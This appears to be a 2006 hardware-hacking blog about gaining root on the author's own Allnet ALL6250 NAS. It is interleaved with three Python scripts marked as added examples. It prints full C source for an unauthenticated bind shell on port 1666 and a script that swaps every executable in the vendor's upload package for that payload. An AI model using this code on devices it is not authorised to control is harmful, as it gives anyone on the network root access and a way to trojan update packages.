Tuesday, January 24, 2006

I was too dumb

Ok, I must admit, I made a stupid mistake. The uClibc I compiled on my box was built against
my 2.6 kernel (that's been configured with devpts support). I linked this statically to the telnet daemon :(

On the ALL6250 there is no devpts, but BSD style ptys still do work. Only the device nodes were missing. But after all, I got a (hacked) utelnetd running on that box. Now that telnet DOES work, I am looking forward to doing some more reasonable stuff.

I am still disappointed about the missing kernel modules, but I think there are some userspace NFS servers around.
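The missing piece mentioned above is just the device nodes for the BSD-style ptys. The script below is an added example (not the blog author's code) that emits the mknod lines for them. It assumes the standard Linux numbering from the kernel's Documentation/devices.txt: char major 2 for the masters /dev/pty[p-za-e][0-9a-f], major 3 for the matching slaves /dev/tty[p-za-e][0-9a-f], minor = 16 * bank + hex digit, banks ordered p..z then a..e.

```python
"""Emit mknod commands for Linux BSD-style pty pairs.

Added example for this page, not the author's code. Numbering is assumed to be
the standard one from Documentation/devices.txt (major 2 masters, major 3 slaves).
"""
PTY_BANKS = "pqrstuvwxyzabcde"   # 16 banks x 16 digits = 256 pairs
PTY_MASTER_MAJOR = 2             # /dev/pty??
PTY_SLAVE_MAJOR = 3              # /dev/tty??


def bsd_pty_nodes(count: int):
    """Return [(path, major, minor), ...] for the first `count` master/slave pairs."""
    if not 0 <= count <= 256:
        raise ValueError("BSD ptys: at most 256 pairs")
    nodes = []
    for minor in range(count):
        bank = PTY_BANKS[minor // 16]
        digit = "%x" % (minor % 16)
        nodes.append(("/dev/pty%s%s" % (bank, digit), PTY_MASTER_MAJOR, minor))
        nodes.append(("/dev/tty%s%s" % (bank, digit), PTY_SLAVE_MAJOR, minor))
    return nodes


def mknod_script(count: int) -> str:
    """Shell lines to paste into the box's shell; existing nodes are left alone."""
    lines = ["#!/bin/sh"]
    for path, major, minor in bsd_pty_nodes(count):
        lines.append("[ -e %s ] || mknod -m 666 %s c %d %d" % (path, path, major, minor))
    return "\n".join(lines) + "\n"


if __name__ == "__main__":
    # 16 pairs (ptyp0..ptypf / ttyp0..ttypf) is plenty for a telnet daemon
    print(mknod_script(16), end="")
```

The generated lines are plain busybox-compatible sh, so they can be pasted into the root shell obtained over nc.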

Sunday, January 22, 2006

Show stopper :(

After fiddling around for some hours, trying to get a telnet daemon running,
I noticed why it won't work:

There is no devpts filesystem in the kernel !!

And sad enough, also modules are disabled!

So, the only possibility to make some reasonable progress is to compile a new kernel ...
There are no sources (yet) at Allnet's download site, but I'll ask them.

Saturday, January 21, 2006

Analysis so far

There are 6 mtd partitions:

mtd_ap_fs
mtd_boot_cfg
mtd_bootloader
mtd_kernel
mtd_linux_cfg
mtd_root_fs

These contain:
mtd_ap_fs: a tar.gz archive containing some files.
They are extracted to /sbin on boot.

mtd_boot_cfg: configuration for the ppcboot bootloader
mtd_bootloader: The ppcboot 2.0.0 bootloader
mtd_kernel: The Linux kernel itself, as gzip compressed ppcboot image
mtd_linux_cfg: a .tar.gz file containing some config files. These files will be copied to /etc on boot:
smb.conf passwd config smbpasswd services hosts resolv.conf group
mtd_root_fs: The root fs (aka initrd). It is an ext2 fs image, gzip compressed, with ppcboot header.

To access it, skip the 64-byte ppcboot image header and decompress the rest:
# dd if=mtd_root_fs of=rootfs.gz bs=64 skip=1
# gunzip rootfs.gz
(gunzip may warn about trailing garbage if the dump still carries the erased flash behind the image; the output is complete anyway.)
Then, rootfs can be mounted over loopback as usual.
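The dd trick above works but trusts nothing. The script below is an added example (not the author's tooling and not from Allnet/Netronix) that parses the 64-byte ppcboot image header in front of mtd_kernel and mtd_root_fs, checks both CRCs, and cuts the payload to the size the header states instead of to the end of the dump. It assumes that ppcboot 2.0.0 writes the same header layout as U-Boot's legacy image.h (magic 0x27051956, zlib CRC32 over the header with its own CRC field zeroed, CRC32 over the data, a 32-byte name); the sample image and the name "ALL6250 rootfs" in the test are constructed.

```python
"""Parse and verify a ppcboot/U-Boot legacy image header, then split off the payload.

Added example for this page; not the ALL6250 firmware's own tooling. Assumed:
ppcboot 2.0.0 uses the U-Boot legacy image.h layout (64-byte header).
"""
import gzip
import struct
import sys
import zlib

IH_MAGIC = 0x27051956
# magic, hcrc, time, size, load, ep, dcrc, os, arch, type, comp, name[32]
IH_FMT = ">IIIIIIIBBBB32s"
IH_LEN = struct.calcsize(IH_FMT)      # 64 bytes, hence "bs=64 skip=1"
IH_TYPE = {1: "standalone", 2: "kernel", 3: "ramdisk", 4: "multi",
           5: "firmware", 6: "script", 7: "filesystem"}
IH_COMP = {0: "none", 1: "gzip", 2: "bzip2"}


def crc32(data: bytes) -> int:
    return zlib.crc32(data) & 0xFFFFFFFF


def parse_image(blob: bytes) -> dict:
    """Return the header fields plus the verified payload, or raise ValueError."""
    if len(blob) < IH_LEN:
        raise ValueError("shorter than a ppcboot header")
    (magic, hcrc, mtime, size, load, ep, dcrc,
     os_, arch, typ, comp, name) = struct.unpack(IH_FMT, blob[:IH_LEN])
    if magic != IH_MAGIC:
        raise ValueError("bad magic 0x%08x" % magic)
    # the header CRC is computed with the hcrc field itself zeroed
    if crc32(blob[:4] + b"\0\0\0\0" + blob[8:IH_LEN]) != hcrc:
        raise ValueError("header CRC mismatch")
    # cut by the size field: an MTD dump is padded with erased flash (0xFF)
    payload = blob[IH_LEN:IH_LEN + size]
    if len(payload) != size:
        raise ValueError("image truncated: header says %d bytes" % size)
    if crc32(payload) != dcrc:
        raise ValueError("data CRC mismatch")
    return {
        "name": name.rstrip(b"\0").decode("ascii", "replace"),
        "size": size, "load": load, "entry": ep, "time": mtime,
        "os": os_, "arch": arch,
        "type": IH_TYPE.get(typ, "unknown(%d)" % typ),
        "comp": IH_COMP.get(comp, "unknown(%d)" % comp),
        "payload": payload,
    }


def build_image(payload: bytes, name: str, typ: int = 3, comp: int = 1,
                load: int = 0, ep: int = 0, os_: int = 5, arch: int = 7) -> bytes:
    """Build an image (os 5 = Linux, arch 7 = PowerPC); used for the constructed sample."""
    name_b = name.encode("ascii")[:32].ljust(32, b"\0")
    hdr = struct.pack(IH_FMT, IH_MAGIC, 0, 0, len(payload), load, ep,
                      crc32(payload), os_, arch, typ, comp, name_b)
    hdr = hdr[:4] + struct.pack(">I", crc32(hdr)) + hdr[8:]
    return hdr + payload


def unpack_payload(img: dict) -> bytes:
    """Decompress the payload when the header says gzip, else pass it through."""
    return gzip.decompress(img["payload"]) if img["comp"] == "gzip" else img["payload"]


if __name__ == "__main__":
    # usage: python3 ppcboot_image.py mtd_root_fs rootfs   (writes the ext2 image)
    with open(sys.argv[1], "rb") as f:
        img = parse_image(f.read())
    for key in ("name", "type", "comp", "size", "load", "entry"):
        print("%-6s %s" % (key, img[key]))
    with open(sys.argv[2], "wb") as f:
        f.write(unpack_payload(img))
```

A mismatching data CRC on a fresh dump usually means the dump itself is bad (wrong partition, short read), which is worth knowing before spending hours on a root filesystem that is not the one the box boots.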


Gained Root Shell

After I finally got a hard disk for my ALL6250, I found an easy possibility to get a root shell.
As said in my previous post, there is a file called ntx_libra.tgz on the support CD. This contained
a couple of executables. I replaced all the executables with my own "shell-server", uploaded the file, and whoops, I can nc to the ALL6250.

Steps:

a) write the code (posted below)
b) install a cross compiler
this is totally easy on gentoo:
# emerge crossdev;
# crossdev -s4 -t powerpc-linux-uclibc
c) compile it (statically, so it does not depend on the box's libc):
# powerpc-linux-uclibc-gcc -o ppc-shellserver -static shell-server.c
d) strip it:
# powerpc-linux-uclibc-strip ppc-shellserver

#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <signal.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <netinet/in.h>

extern char **environ;

#define DEFAULT_SERVER_PORT     1666

void sigchld_handler(int arg);

int main(int argc, char *argv[])
{
        int dev_null;
        int client_sock;
        int server_sock;
        int connected_to_socket = 0;
        int i = 0;
        struct sockaddr_in server_addr;

        (void)argc;
        (void)argv;

        /* detach from terminal: the parent exits, the child carries on */
        if (fork())
                return 0;

        /* get own SID, so there is no controlling tty */
        setsid();

        /* redirect stdin, stdout and stderr to /dev/null */
        dev_null = open("/dev/null", O_RDWR);
        if (dev_null != -1) {
                dup2(dev_null, 0);
                dup2(dev_null, 1);
                dup2(dev_null, 2);
        }

        /* create socket */
        if ((server_sock = socket(AF_INET, SOCK_STREAM, 0)) == -1)
                return -1;

        /* bind to a tcp port on all interfaces */
        memset(&server_addr, 0, sizeof(server_addr));
        server_addr.sin_family = AF_INET;
        server_addr.sin_addr.s_addr = htonl(INADDR_ANY);

        /* try 1666, 1667, ... until bind() succeeds (at most 11 ports) */
        while (!connected_to_socket) {
                server_addr.sin_port = htons(DEFAULT_SERVER_PORT + i);
                connected_to_socket = 1;

                if (bind(server_sock, (struct sockaddr *)&server_addr,
                         sizeof(server_addr)) == -1) {
                        connected_to_socket = 0;
                        i++;
                        if (i > 10) {
                                close(server_sock);
                                return -1;
                        }
                }
        }

        /* listen */
        if (listen(server_sock, 5) == -1) {
                close(server_sock);
                return -1;
        }

        /* reap finished shells so they do not linger as zombies */
        signal(SIGCHLD, sigchld_handler);

        for (;;) {
                /* accept (EINTR from SIGCHLD just loops around) */
                if ((client_sock = accept(server_sock, NULL, 0)) == -1)
                        continue;

                if (fork()) {
                        /* parent: the client socket is only used in the child */
                        close(client_sock);
                } else {
                        char *argv_new[2];

                        /* child: the listening socket is only used by the parent */
                        close(server_sock);

                        /* prepare for execve */
                        argv_new[0] = "/bin/sh";
                        argv_new[1] = NULL;

                        /* wire the shell's stdin, stdout, stderr to the connection */
                        dup2(client_sock, 0);
                        dup2(client_sock, 1);
                        dup2(client_sock, 2);

                        /* replace this process with /bin/sh */
                        execve(argv_new[0], argv_new, environ);

                        /* only reached if execve() failed */
                        return 0;
                }
        }
}

void sigchld_handler(int arg)
{
        (void)arg;
        /* collect every exited child without blocking */
        while (waitpid(-1, NULL, WNOHANG) > 0)
                ;
}
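The upload trick itself, replacing every executable in ntx_libra.tgz with the static shell server while leaving the lp -> lpd symlink and ntx_chset.h untouched, is easy to get wrong by hand (a member with the wrong size or mode, a symlink turned into a file). The script below is an added example, not the author's tooling and not anything shipped by Allnet or Netronix. It assumes nothing about the update mechanism beyond what the page shows: a gzip'ed tar of the members listed in the `file *` output. The member names in the sample come from that listing; the ELF contents in the sample are made up.

```python
"""Rebuild ntx_libra.tgz with every ELF executable swapped for one static binary,
keeping symlinks (lp -> lpd) and plain files (ntx_chset.h) as they are.

Added example for this page; not tooling from the author or from Allnet/Netronix.
"""
import io
import tarfile

ELF_MAGIC = b"\x7fELF"


def repack_with_payload(src_tgz: bytes, payload: bytes):
    """Return (new .tgz bytes, names of the members that were replaced)."""
    replaced = []
    out = io.BytesIO()
    with tarfile.open(fileobj=io.BytesIO(src_tgz), mode="r:gz") as src, \
         tarfile.open(fileobj=out, mode="w:gz") as dst:
        for m in src.getmembers():
            if not m.isfile():
                dst.addfile(m)          # symlinks, directories: copied verbatim
                continue
            data = src.extractfile(m).read()
            if data.startswith(ELF_MAGIC):
                data = payload
                m.size = len(data)      # tar header must match the new body
                m.mode = 0o755          # whatever starts it must be able to exec it
                replaced.append(m.name)
            dst.addfile(m, io.BytesIO(data))
    return out.getvalue(), replaced


def _add_file(t, name, data, mode):
    ti = tarfile.TarInfo(name)
    ti.size = len(data)
    ti.mode = mode
    t.addfile(ti, io.BytesIO(data))


def make_sample_tgz() -> bytes:
    """Constructed stand-in for ntx_libra.tgz: fake ELF headers, not real programs."""
    fake_elf = ELF_MAGIC + b"\x01\x02\x01" + b"\0" * 9   # class 32, MSB, version 1
    out = io.BytesIO()
    with tarfile.open(fileobj=out, mode="w:gz") as t:
        for name in ("bt_clnt", "lpd", "upnp_soho", "watch_prog"):
            _add_file(t, name, fake_elf + name.encode(), 0o755)
        _add_file(t, "ntx_chset.h", b"#define NTX_CHSET 1\n", 0o644)
        link = tarfile.TarInfo("lp")
        link.type = tarfile.SYMTYPE
        link.linkname = "lpd"
        t.addfile(link)
    return out.getvalue()


def read_members(tgz: bytes) -> dict:
    """name -> file bytes, or 'symlink:<target>' for links; used to check the result."""
    members = {}
    with tarfile.open(fileobj=io.BytesIO(tgz), mode="r:gz") as t:
        for m in t.getmembers():
            members[m.name] = ("symlink:" + m.linkname if m.issym()
                               else t.extractfile(m).read())
    return members


if __name__ == "__main__":
    import sys
    # usage: python3 repack.py ntx_libra.tgz ppc-shellserver ntx_libra_patched.tgz
    with open(sys.argv[1], "rb") as f, open(sys.argv[2], "rb") as p:
        new_tgz, names = repack_with_payload(f.read(), p.read())
    with open(sys.argv[3], "wb") as f:
        f.write(new_tgz)
    print("replaced:", ", ".join(names))
```

Selecting members by the ELF magic rather than by name means the script does not care which of the programs the box actually starts after the upload; every one of them becomes the shell server, exactly as the post describes.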

Wednesday, January 18, 2006

Got the Device

Today, I got the Allnet (www.allnet.de) ALL6250 NAS. It is a relabelled Netronix (www.netroxinc.com.tw) NH-230. The hardware specs are:

CPU: Freescale MPC8241 @ 266MHz
Memory: 4 x ESMT M12L128168A-7T
(this is 64MB, organized as 8Mx64)
FLASH: MXIC 29LV320ABTC-90 (4MB)
LAN: Realtek RTL8169 GbE
IDE: ITE IT8211F (only one channel available)
USB: Genesys Logic GL880S

There is a pin header for RS232. I will try to get some sort
of level shifter.

Firmware analysis so far:

Neither Allnet nor Netronix provide the source code (yet).

nmap says it is a Linux kernel in the range of 2.4.0 - 2.5.20.
There are only ports open for:
a) HTTP for setup on port 80
b) HTTP in general on 8080.

Nothing else so far (but I started it without a hard disk).

On the support CD, there is a file called ntx_libra.tgz.
It should be uploaded via the setup web interface to
support a UPnP printer server.

I extracted the file, and it contained a couple of executables:

root:/tmp/dxxx> file *
bt_clnt: ELF 32-bit MSB executable, PowerPC or cisco 4500, version 1 (SYSV), statically linked, stripped
lp: symbolic link to `lpd'
lpc: ELF 32-bit MSB executable, PowerPC or cisco 4500, version 1 (SYSV), dynamically linked (uses shared libs), stripped
lpd: ELF 32-bit MSB executable, PowerPC or cisco 4500, version 1 (SYSV), dynamically linked (uses shared libs), stripped
lpq: ELF 32-bit MSB executable, PowerPC or cisco 4500, version 1 (SYSV), dynamically linked (uses shared libs), stripped
lpr: ELF 32-bit MSB executable, PowerPC or cisco 4500, version 1 (SYSV), dynamically linked (uses shared libs), stripped
lprm: ELF 32-bit MSB executable, PowerPC or cisco 4500, version 1 (SYSV), dynamically linked (uses shared libs), stripped
ntx_chset.h: ASCII C program text
upnp_soho: ELF 32-bit MSB executable, PowerPC or cisco 4500, version 1 (SYSV), statically linked, stripped
watch_prog: ELF 32-bit MSB executable, PowerPC or cisco 4500, version 1 (SYSV), statically linked, stripped

This definitely looks like a good starting point!

I will try to create my own nextra.tgz file, replacing all executables with my own, statically linked executable, that will open a root shell on some network port.